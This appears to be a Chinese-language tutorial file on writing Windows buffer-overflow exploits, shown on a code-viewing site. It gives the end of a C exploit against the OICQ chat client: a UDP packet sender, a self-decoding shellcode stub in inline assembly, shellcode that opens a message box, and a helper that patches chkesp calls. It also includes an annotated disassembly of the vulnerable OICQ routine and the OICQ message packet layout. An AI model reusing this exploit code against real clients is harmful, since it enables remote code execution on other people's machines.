📄 windows下的溢出程序编写技巧.txt
字号:
buff1[0x5]=j;
buff1[0x6]=j+1;
j=sendpacketlong;
buff[j-1]=0x03;
fprintf(stderr,"\n send packet %d bytes.",j);
sendto(fd,buff,j,0,(const struct sockaddr FAR* )&s_in3,sizeof(struct sockaddr_in));
}
closesocket(fd);
WSACleanup( );
return(0);
}
void shellcodefnlock()
{
_asm{
nop
nop
nop
nop
jmp next
getediadd: pop EDI
push EDI
pop ESI
looplock: lodsw
sub AX,0x4141
shl AL,4
xor AL,AH
stosb
cmp AH,0x10
jb looplock
jmp shell
next: call getediadd
shell: nop
nop
nop
nop
}
}
void shellcodefn()
{
// const char str[]="user32.dll""\x0""MessageBoxA""\x0""msvcrtd.dll""\x0""exit";
FARPROC procloadlib,procgetadd,procmsg,procexit;
char *stradd;
HANDLE libhandle;
procloadlib = LoadLibraryfnaddress;
procgetadd = GetProcAddressfnaddress;
_asm
{
jmp nextcall
getstradd: pop stradd
}
libhandle=procloadlib(stradd+STR0);
procmsg=procgetadd(libhandle,stradd+STR1);
procmsg(0,stradd+STR3,stradd+STR2,0);
// libhandle=procloadlib(stradd+STR6);
// opensocketadd=procgetadd(stradd+str7);
libhandle=procloadlib(stradd+STR4);
procexit =procgetadd(libhandle,stradd+STR5);
procexit(0);
_asm{
die: jmp die
nextcall: call getstradd
nop
nop
nop
nop
}
}
void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{
int i,k;
unsigned char temp;
char *calladd;
for(i=0;i<len;++i){
temp=shellbuff[i];
if(temp==0xe8){
// (int *)k=*(shellbuff+i+1);
k=shellbuff+i+1;
_asm{
mov EDI,k
mov EDI,[EDI]
mov k,EDI
}
calladd=fnadd;
calladd+=k;
calladd+=i;
calladd+=5;
if(calladd==chkesp){
shellbuff[i]=0x90;
shellbuff[i+1]=0x43; // inc ebx
shellbuff[i+2]=0x4b; // dec ebx
shellbuff[i+3]=0x43;
shellbuff[i+4]=0x4b;
}
}
}
}
/* OICQ有问题代码
:00425D51 837C240800 cmp dword ptr [esp+08], 00000000
:00425D56 740C je 00425D64
:00425D58 8B01 mov eax, dword ptr [ecx]
:00425D5A FF742408 push [esp+08]
:00425D5E FF90B8000000 call dword ptr [eax+000000B8]
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00425D56(C)
|
:00425D64 33C0 xor eax, eax
:00425D66 C20800 ret 0008
:00425D69 B8E4774900 mov eax, 004977E4
:00425D6E E80D700300 call 0045CD80
:00425D73 81EC10040000 sub esp, 00000410
;有溢出 yrg 2000.04.18
;缓冲区大小
:00425D79 53 push ebx
:00425D7A 56 push esi
:00425D7B 8B7508 mov esi, dword ptr [ebp+08]
:00425D7E 8D85E4FBFFFF lea eax, dword ptr [ebp+FFFFFBE4]
:00425D84 57 push edi
:00425D85 50 push eax
:00425D86 FF7628 push [esi+28]
:00425D89 8BD9 mov ebx, ecx
:00425D8B FF7624 push [esi+24]
:00425D8E E8C9000000 call 00425E5C
:00425D93 85C0 test eax, eax
:00425D95 0F84B0000000 je 00425E4B
:00425D9B 8D85E8FBFFFF lea eax, dword ptr [ebp+FFFFFBE8]
:00425DA1 8D4DF0 lea ecx, dword ptr [ebp-10]
:00425DA4 50 push eax
:00425DA5 E8CFF10400 call 00474F79
:00425DAA 8365FC00 and dword ptr [ebp-04], 00000000
:00425DAE 8BBDE6FBFFFF mov edi, dword ptr [ebp+FFFFFBE6]
:00425DB4 56 push esi
:00425DB5 8D4D08 lea ecx, dword ptr [ebp+08]
:00425DB8 E8BCF10400 call 00474F79
:00425DBD 0FB785E4FBFFFF movzx eax, word ptr [ebp+FFFFFBE4]
:00425DC4 8B7620 mov esi, dword ptr [esi+20]
:00425DC7 83E878 sub eax, 00000078
:00425DCA C645FC01 mov [ebp-04], 01
:00425DCE 7434 je 00425E04
:00425DD0 48 dec eax
:00425DD1 7560 jne 00425E33
:00425DD3 51 push ecx
:00425DD4 8D45F0 lea eax, dword ptr [ebp-10]
:00425DD7 8BCC mov ecx, esp
:00425DD9 8965EC mov dword ptr [ebp-14], esp
:00425DDC 50 push eax
:00425DDD E89EEE0400 call 00474C80
:00425DE2 57 push edi
:00425DE3 56 push esi
:00425DE4 51 push ecx
:00425DE5 8D4508 lea eax, dword ptr [ebp+08]
:00425DE8 8BCC mov ecx, esp
:00425DEA 8965E8 mov dword ptr [ebp-18], esp
:00425DED 50 push eax
:00425DEE C645FC03 mov [ebp-04], 03
:00425DF2 E889EE0400 call 00474C80
:00425DF7 8BCB mov ecx, ebx
:00425DF9 C645FC01 mov [ebp-04], 01
:00425DFD E8D4030000 call 004261D6
:00425E02 EB2F jmp 00425E33
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00425DCE(C)
|
:00425E04 51 push ecx
:00425E05 8D45F0 lea eax, dword ptr [ebp-10]
:00425E08 8BCC mov ecx, esp
:00425E0A 8965E8 mov dword ptr [ebp-18], esp
:00425E0D 50 push eax
:00425E0E E86DEE0400 call 00474C80
:00425E13 57 push edi
:00425E14 56 push esi
:00425E15 51 push ecx
:00425E16 8D4508 lea eax, dword ptr [ebp+08]
:00425E19 8BCC mov ecx, esp
:00425E1B 8965EC mov dword ptr [ebp-14], esp
:00425E1E 50 push eax
:00425E1F C645FC02 mov [ebp-04], 02
:00425E23 E858EE0400 call 00474C80
:00425E28 8BCB mov ecx, ebx
:00425E2A C645FC01 mov [ebp-04], 01
:00425E2E E860040000 call 00426293
* Referenced by a (U)nconditional or (C)onditional Jump at Addresses:
|:00425DD1(C), :00425E02(U)
|
:00425E33 8065FC00 and byte ptr [ebp-04], 00
:00425E37 8D4D08 lea ecx, dword ptr [ebp+08]
:00425E3A E8CCF00400 call 00474F0B
:00425E3F 834DFCFF or dword ptr [ebp-04], FFFFFFFF
:00425E43 8D4DF0 lea ecx, dword ptr [ebp-10]
:00425E46 E8C0F00400 call 00474F0B
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00425D95(C)
|
:00425E4B 8B4DF4 mov ecx, dword ptr [ebp-0C]
:00425E4E 5F pop edi
:00425E4F 5E pop esi
:00425E50 64890D00000000 mov dword ptr fs:[00000000], ecx
:00425E57 5B pop ebx
:00425E58 C9 leave
:00425E59 C20400 ret 0004
*/
/* OICQ消息的UDP数据结构,参见ZER9的《OICQ的安全问题 》
struct TOicqPtoP
{
char Tag1; // 0x02 // 显然是 Oicq 的协议编号 or 版本,固定
char Tag2; // 0x01 // 显然是 Oicq 的协议编号 or 版本,固定
char Tag3; // 0x07
char Tag4; // 0x00
char Tag5; // 0x78
char Tag6; // 这两个字节相当于 unix 上的进程 ID,
char Tag7; // 随便赋值就可。
char cOicqNub[]; // 发送方的Oicq 号码。 exp:123456
char cFF; // 0x1f 在所有的Oicq 信息结构中,分割符都是 0x1f
char cR; // '0' 固定
char cFF; //
char cE[]; // "75" ,这一位相对固定,可能是操作方式。
char cFF;
char cDateTime[]; // exp: "2000-4-10",0x1f,"12:00:12",0x1f
char OutMsg[]; // 发送的消息内容。
char cEnd; // 0x03 ,所有的 oicq 信息都已 0x03 为标记结束。
};
*/
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -